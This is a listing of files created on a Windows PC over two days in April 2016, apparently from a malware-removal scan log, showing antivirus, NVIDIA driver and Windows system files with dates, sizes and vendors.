2016-04-15 01:30 - 2016-04-15 01:30 - 00166432 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswStm.sys
2016-04-15 01:30 - 2016-04-15 01:30 - 00161760 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\ngvss.sys
2016-04-15 01:30 - 2016-04-15 01:30 - 00107792 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswMonFlt.sys
2016-04-15 01:30 - 2016-04-15 01:30 - 00103064 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRdr2.sys
2016-04-15 01:30 - 2016-04-15 01:30 - 00074544 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRvrt.sys
2016-04-15 01:30 - 2016-04-15 01:30 - 00052184 _____ (AVAST Software) C:\WINDOWS\avastSS.scr
2016-04-15 01:30 - 2016-04-15 01:30 - 00037656 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswHwid.sys
2016-04-15 01:30 - 2016-04-15 01:30 - 00037144 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswKbd.sys
2016-04-15 01:30 - 2016-04-15 01:30 - 00004006 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
2016-04-15 01:30 - 2016-04-15 01:30 - 00003188 _____ C:\WINDOWS\System32\Tasks\SafeZone scheduled Autoupdate 1460676658
2016-04-15 01:30 - 2016-04-15 01:30 - 00001979 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast Free Antivirus.lnk
2016-04-15 01:30 - 2016-04-15 01:30 - 00001967 _____ C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2016-04-15 01:30 - 2016-04-15 01:30 - 00001082 _____ C:\Users\Public\Desktop\Avast SafeZone Browser.lnk
2016-04-15 01:30 - 2016-04-15 01:30 - 00001082 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2016-04-15 01:30 - 2016-04-15 01:30 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\AVAST Software
2016-04-15 01:29 - 2016-04-15 01:30 - 00000000 ____D C:\Program Files\AVAST Software
2016-04-15 01:29 - 2016-04-15 01:29 - 05168280 _____ (AVAST Software) C:\Users\Marcel\Downloads\avast_free_antivirus_setup_online.exe
2016-04-15 01:28 - 2016-04-15 01:28 - 00027618 _____ C:\ProgramData\1460676498.bdinstall.bin
2016-04-15 01:27 - 2016-04-15 01:27 - 00239160 _____ C:\ProgramData\1460676404.bdinstall.bin
2016-04-15 00:53 - 2016-04-15 00:53 - 00000880 _____ C:\Users\Marcel\Desktop\JRT.txt
2016-04-15 00:26 - 2016-04-15 00:26 - 00001171 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-04-15 00:04 - 2016-04-15 00:04 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\Temp
2016-04-15 00:00 - 2016-04-15 00:00 - 00000000 ____D C:\WINDOWS\system32\appmgmt
2016-04-15 00:00 - 2016-04-15 00:00 - 00000000 ____D C:\Users\Marcel\AppData\Local\BlueStacks
2016-04-14 23:54 - 2016-04-14 23:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan
2016-04-14 23:54 - 2016-03-22 03:57 - 00110528 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2016-04-14 23:53 - 2016-03-22 06:08 - 42923576 _____ C:\WINDOWS\system32\nvcompiler.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 37567424 _____ C:\WINDOWS\SysWOW64\nvcompiler.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 31594432 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 25350080 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 21364536 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 20906168 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 17755928 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 17369448 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvd3dumx.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 17349776 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 10550552 _____ C:\WINDOWS\system32\nvptxJitCompiler.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 08659472 _____ C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 02614208 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 02260024 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 01922496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6436472.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 01571776 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6436472.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00960056 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00889400 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00786872 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00751552 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00695864 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00678520 _____ C:\WINDOWS\system32\nvfatbinaryLoader.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00632336 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00572096 _____ C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00546328 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvumdshimx.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00448824 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvumdshim.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00425016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00385080 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00379448 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00379296 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00348216 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00317656 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00213952 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00176064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvinitx.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00153392 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvinit.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00151368 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglshim64.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00129208 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglshim32.dll
2016-04-14 23:53 - 2016-03-22 06:08 - 00000139 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2016-04-14 23:53 - 2016-03-22 06:08 - 00000139 _____ C:\WINDOWS\system32\nv-vk64.json
2016-04-14 23:45 - 2016-04-14 23:53 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2016-04-14 23:45 - 2016-03-21 22:01 - 00109632 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2016-04-14 23:45 - 2016-03-21 22:01 - 00100416 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2016-04-14 23:20 - 2016-04-14 23:20 - 325447275 _____ C:\Users\Marcel\Desktop\Studium.rar
2016-04-14 20:34 - 2016-04-15 01:27 - 00003134 _____ C:\bdlog.txt
2016-04-14 20:33 - 2016-04-14 20:33 - 00000385 _____ C:\Users\Marcel\AppData\Roaminguser_gensett.xml
2016-04-14 20:32 - 2016-04-14 20:32 - 00000385 _____ C:\WINDOWS\system32\user_gensett.xml
2016-04-14 20:32 - 2016-04-14 20:32 - 00000000 ____D C:\ProgramData\BDLogging
2016-04-14 20:32 - 2007-04-11 11:11 - 00511328 _____ (Microsoft Corporation) C:\WINDOWS\capicom.dll
2016-04-14 20:31 - 2016-04-14 20:31 - 00000000 ____D C:\Users\Marcel\AppData\Roaming\QuickScan
2016-04-14 20:30 - 2016-04-15 01:28 - 00000000 ____D C:\Program Files\Bitdefender Agent
2016-04-14 20:30 - 2016-04-14 20:30 - 00000000 ____D C:\ProgramData\Bitdefender Agent
2016-04-14 19:08 - 2016-04-14 19:08 - 00000000 ____D C:\Users\Marcel\AppData\Local\ESET
2016-04-14 18:55 - 2016-04-14 18:55 - 03670016 _____ C:\Users\Marcel\Downloads\adwcleaner_5.111.exe
2016-04-14 12:41 - 2016-04-14 12:41 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-04-14 03:23 - 2016-04-15 11:46 - 00000000 ___DC C:\WINDOWS\Panther
2016-04-14 03:22 - 2016-04-14 03:22 - 00000000 ____D C:\Windows.old
2016-04-14 03:21 - 2016-04-14 03:21 - 24602112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 22564328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 22378496 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 21124344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 19340800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 18673664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 16985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 14252544 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 13018624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 12586496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 12125184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 11545600 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 08705672 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 07979008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 07836160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 07533568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 07474016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 07199232 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 06972416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 06952088 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 06740992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 06607080 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 06297088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 05662208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 05321728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 05242496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 05202944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 04894208 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 04827136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 04774912 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 04412928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 03994624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 03671888 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 03671040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 03592704 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 03575296 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 03449168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSService.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 03428864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 03351040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 03078144 _____ (Microsoft Corporation) C:\WINDOWS\system32\esent.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02919320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02912256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02798080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02773096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02722816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\esent.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02656952 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02635776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02604032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02581504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02544264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02403680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 02295808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02275328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02229760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02193408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02186864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02180136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02158592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02152280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 02061312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01997152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 01996288 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01946112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01902592 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01862008 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01847808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 01832448 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01818696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01799680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01731584 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01714688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01707520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01613664 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01588224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01575936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01557768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01497088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01444352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRHInproc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01410560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01395712 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 01388032 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01322248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-04-14 03:21 - 2016-04-14 03:21 - 01297752 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01239552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01224704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01211904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01152864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 01152328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01141504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-04-14 03:21 - 2016-04-14 03:21 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSave.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01131520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01117184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01105920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01098240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01090048 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01089888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-04-14 03:21 - 2016-04-14 03:21 - 01072128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01056256 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01052160 _____ (Microsoft Corporation) C:\WINDOWS\system32\MsSpellCheckingFacility.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 01030416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-04-14 03:21 - 2016-04-14 03:21 - 01017032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00997376 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00990720 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00989536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-04-14 03:21 - 2016-04-14 03:21 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00986976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00982016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00980352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00965632 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00958976 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoteNaturalLanguage.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00957952 _____ (Microsoft Corporation) C:\WINDOWS\system32\IKEEXT.DLL
2016-04-14 03:21 - 2016-04-14 03:21 - 00957608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00948736 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00938496 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00938496 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00895080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00890368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00888320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
